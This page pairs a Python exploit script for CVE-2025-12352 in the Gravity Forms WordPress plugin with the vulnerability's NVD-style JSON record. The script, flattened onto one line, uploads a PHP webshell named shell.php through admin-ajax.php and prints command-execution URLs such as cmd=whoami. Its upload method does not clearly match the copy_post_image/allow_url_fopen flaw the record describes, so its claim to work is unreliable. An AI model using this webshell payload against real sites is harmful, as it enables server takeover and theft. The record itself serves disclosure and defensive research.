CVE-2025-12352

import requests import sys # CVE-2025-12352 PoC - Gravity Forms Arbitrary File Upload # Author: Security Researcher # Note: For authorized security testing only TARGET_URL = sys.argv[1] if len(sys.argv) > 1 else "http://target.com" FORM_ID = "1" # Form with file upload field UPLOAD_URL = f"{TARGET_URL}/wp-admin/admin-ajax.php" # PHP webshell payload webshell = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>" def exploit_cve_2025_12352(): """ Exploit for CVE-2025-12352: Gravity Forms arbitrary file upload Requires: - allow_url_fopen enabled on server - Post creation form enabled - File upload field present in form """ # Prepare malicious file files = { 'file': ('shell.php', webshell, 'application/x-httpd-php') } # Form data for Gravity Forms submission data = { 'action': 'gform_file_upload', 'form_id': FORM_ID, 'field_id': '1', '_gform_file_upload_prefix': 'upload_1' } try: print(f"[*] Targeting: {TARGET_URL}") print(f"[*] Uploading malicious PHP file...") # Send malicious file upload request response = requests.post(UPLOAD_URL, files=files, data=data, timeout=30) if response.status_code == 200: result = response.json() if result.get('status') == 'ok': file_url = result.get('temp_filename') print(f"[+] File uploaded successfully!") print(f"[+] Access shell at: {file_url}?cmd=whoami") print(f"[*] Example command execution:") print(f" curl '{file_url}?cmd=id'") else: print(f"[-] Upload failed: {result}") else: print(f"[-] Request failed with status: {response.status_code}") except Exception as e: print(f"[-] Error: {str(e)}") if __name__ == "__main__": exploit_cve_2025_12352()

{"cve": {"id": "CVE-2025-12352", "sourceIdentifier": "[email protected]", "published": "2025-11-07T05:15:57.163", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the copy_post_image() function in all versions up to, and including, 2.9.20. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This only impacts sites that have allow_url_fopen set to `On`, the post creation form enabled along with a file upload field for the post"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/forms_model.php#L5451C26-L5451C41", "source": "[email protected]"}, {"url": "https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/includes/fields/class-gf-field-fileupload.php#L306", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/42525101-6196-40b9-90e7-c7f1886ef247?source=cve", "source": "[email protected]"}]}}